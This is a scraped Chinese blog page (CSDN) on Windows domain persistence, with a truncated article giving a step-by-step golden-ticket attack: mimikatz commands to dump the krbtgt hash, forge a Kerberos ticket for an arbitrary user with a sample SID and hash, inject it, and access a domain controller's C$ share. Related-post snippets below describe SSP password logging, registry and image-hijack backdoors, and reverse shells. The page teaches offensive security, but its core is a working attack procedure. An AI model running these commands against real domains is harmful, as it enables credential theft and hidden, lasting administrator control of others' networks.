内网安全-权限维持-黄金白银票据维持&基于登录进程劫持-Skeleton Key&SID history&DSRM&SSP权限维持

最新推荐文章于 2024-07-03 16:35:30 发布
最新推荐文章于 2024-07-03 16:35:30 发布
阅读量794 收藏 1
点赞数
分类专栏: 内网安全 文章标签: web安全 服务器 windows 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45701675/article/details/124397597
版权
本文详细介绍了如何利用黄金和白银票据进行域内权限维持,包括获取krbtgt和DC的哈希,伪造用户票据,并通过Skeleton Key、SSP、DSRM和SID历史记录来实现权限持久化。这些技术涉及网络攻击和防御,对理解域安全至关重要。
摘要由CSDN通过智能技术生成

黄金票据

条件:

1、已经拿下域管理员,获取到krbtgt hash;域控SID值-500

2、利用krbtgt的hash制作黄金票据工具,进行攻击。

流程:

1、域名:god.org(ipconfig -all #获取域名)

2、域的SID值:S-1-5-21-1218902331-2157346161-1782232778

获取SID命令:

>whoami /user

>whoami /all

>wmic useraccount get name,sid #获取SID(选500结尾的)

 

获取krbtgt的HASH

>mimikatz privilege::debug

>mimikatz lsadump::lsa /patch #获取krbtgt的ntlmhash

4、伪造用户名:webadmin(任意用户名)

god.org(当前域名)

webadmin(当前用户)

生成票据:

mimikatz kerberos::golden /user:webadmin /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /krbtgt:b097d7ed97495408e1537f706c357fc5 /ticket:gf

 

导入内存:

mimikatz kerberos::ptt gf

 访问测试:

dir \\owa2010cn-god\c$

黄金票据总结:

该攻击⽅式其实是⼀种后⻔的形式,属于第⼆

最低0.47元/天 解锁文章
无名安全
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
黄金票据维持域控权限
weixin_49196285的博客
12-07 924
黄金票据维持域控权限 实验环境:windows2012域控、windows2012域内主机 实验要求:利用黄金票据维持域控权限 详细步骤: 1.首先搭建相关的域环境 a:设置服务器 b:更改计算机名称 C.安装域控制器和DNS服务 设置完成以后的安装页面如下: d:之后升级服务器并且添加相关的域名,配置完成以后可以在如下页面看到: e:之后把WIN7添加到域控之中,成为域控成员。最后添加用户成功并且最后发现域控搭建成功,登录页面如下: 2.
web权限维持
wodafa的博客
02-27 1296
前言 关于权限维持,我之前写过一篇基于系统端的后门技术文章,如映像劫持啊,lpk之类。当然啦,在拿到权限后,在web端做手脚也是个好办法。 PS:还是希望论坛早点支持markdown哦,不然排版很是费劲。 内容目录: - 构造文件包含漏洞 - 隐蔽性脚本木马 - 构造sql注入点 正文 0x01 构造文件包含漏洞 >**本部分概览:** > * 基本的文
windows内网渗透--权限维持
最新发布
weixin_47099592的博客
07-03 639
scr 文件实际上是一个可执行文件,类似于 .exe 文件。它们可以包含相同的代码,并且可以执行相同的任务。注释掉#source /etc/network/interfaces.d/*这个见我上一篇文章,这个还有个思路就是劫持后可以写一个添加管理员用户。将Administrator账户所复制的值,粘贴到hack。成功实现最基础的windows run注册表持久化。攻击机 kali 192.168.1.100。复制Administrator 中的F键值。接下来我们实现最简单的windows持久化。
权限维持-黄金票据
m0_64815693的博客
06-04 257
权限维持-黄金票据
内网权限维持
m0_55751267的博客
11-22 1759
事实上在该过程中,Windows还会在注册表的上述路径中查询所有的映像劫持子键,如果存在和该程序名称完全相同的子键,就查询对应子健中包含的“Dubugger”键值名,并用其指定的程序路径来代替原始的程序,之后执行的是遭到“劫持”的虚假程序。管理员权限的后门可以设置更多的计划任务,例如重启后运行等。Run中的程序是WINDOWS初始化后才运行的,而RunService中的程序是在操作系统启动时就开始运行的,也就是说RunServices中的程序先于Run中的程序运行,如电源管理程序。反弹管理员shell。
毕设&课设&项目&实训-基于page-skeleton-webpack-plugin的修改.zip
02-08
【项目资源】: 包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。 ... 【项目质量】: 所有源码都经过严格测试,...
Awesome-Skeleton-based-Action-Recognition:基于骨架的动作识别
05-11
令人敬畏的基于骨骼的动作识别如果您有任何问题,建议或改进,请提交问题或PR。去做 论文清单 监督方法 半监督方法 无监督方法 对抗方法 监督方法排行榜 NTU RGB + D NTU RGB + D 120 无监督和半监督方法的排行榜...
基于 vue-skeleton-webpack-plugin 的骨架屏实战
10-16
在本文中,我们将深入探讨如何使用 `vue-skeleton-webpack-plugin` 在 Vue 项目中实现骨架屏功能。骨架屏,或称 Skeleton Screen,是一种优化用户体验的技术,它在网页内容实际加载之前展示一个模拟页面布局的静态...
jekyll-skeleton:基于Minima和Skeleton CSS的基本Jekyll主题
02-03
杰基尔骨骼 作为Jekyll主题的超简单实现。 为什么? 我已经厌倦了繁琐CSS框架(Bootstrap和Foundation),因为它们下载量很大,并且无法自定义博客。 我知道您只能从每个组件中选择... $ gem install jekyll-skeleton
symfony-docker:使用Docker的新Symfony应用程序的模板:.install.sh &&:rocket:
02-06
Symfony和Docker 使用Docker的新Symfony应用程序的模板。默认堆栈PHP-FPM NGINX MySQL(开发默认)产品特点sh -c " ./install.sh; curl -I http://localhost:8080 " 裸Symfony默认内置测试和质量保证开箱即用的生产...
God.org单域环境攻略(三)1
08-08
God.org单域环境攻略(三)1
权限维持-域渗透攻击-Golden Ticket (黄金票据)
weixin_43227251的博客
04-13 1639
Golden Ticket (黄金票据) 简义 : 在拥有普通域用户权限和 krbtgt账号的hash的情况下,获取域管理员权限。 发生在上面的过程3,可以伪造TGT(前提是获取krbtgt账号的口令散列值(hash)),宣称自己是域内任何账号,包括域管或者不存在的用户。 1. 首先,黄金票据是全功能的TGT。也就意味着万能票据可用于Kerberos认证的任何服务。票据授予服务盲目地相信TGT中的信息,然后处理TGT并颁发服务票据。 内存中插入黄金票据并不需要提升权限。而且默认情况下,黄金票据的有效期是10
内网安全--权限维持
weixin_58782362的博客
11-05 817
C:\Windows\System32\mimilsa.log 记录登录的账号密码(前提条件是需要在线切换用户,且服务器不重启)1、mimilib.dll 传到目标域控的c:\windows\system32\目录下。c:\windows\system32\kiwissp.log 记录账号密码文件。方法一:但如果域控制器,被注入的内存的伪造的ssp将会丢失。域环境的权限维持、单机版的权限维持web权限维持。使用此方法即使系统重启,也不会影响到持久化的效果。权限维持:为攻击者创造出稳定的输出。
windows权限维持黄金白银票据&隐藏用户&远控&RustDesk&GotoHttp
剁椒鱼头没剁椒的博客
08-16 1812
总的来说隐藏用户目前的手段基本上服务器出现问题,第一件事都是查询隐藏用户,所以这个算是后门的一种方式,但是现在再来看已经不是那么好用了。这个工具存在一个问题就是有网络的情况下才能够使用,而在无网络的情况下是无法使用的,同时流量是走https协议,需要目标主机开放443端口。简单来说就是:有网络,无限制,可以使用。有网络,如果防火墙限制了443端口,无法使用。无网络,无限制,可以使用,但是可能需要转发,比较麻烦。无网络,有限制,基本上就是无法使用。
权限维持——黄金票据和白金票据
cxrpty的博客
04-03 1991
获得域控得用户密码时,为了防止密码被改,需要进行权限维持 实验一:黄金票据 实验原理:ms14068的漏洞原理是伪造域管的tgt,而黄金票据的漏洞原理是伪造krbtgt用户的票据,krbtgt用户是域控中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户 实验条件: 1.域名称 2.域的SID 值 3.域的KRBTGT账户NTLM密码哈希或者aes-256值 4.伪造...
权限维持(黄金票据白银票据)
qq_18811919的博客
03-19 1953
黄金票据白银票据通常被认为属于票据传递攻击(Pass-the-Ticket,简称PTT)的一种。 这是一种针对Windows身份验证系统的攻击,攻击者可以利用缺陷或弱点获取用户或系统 帐户的票据信息,然后将其用于进一步攻击或访问敏感资源本篇文章注意讲述了黄金票据白银票据的数据包分析以及如何进行PTT攻击,讲述了多种利用方式包括CS/mimikatz/Impacket等。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值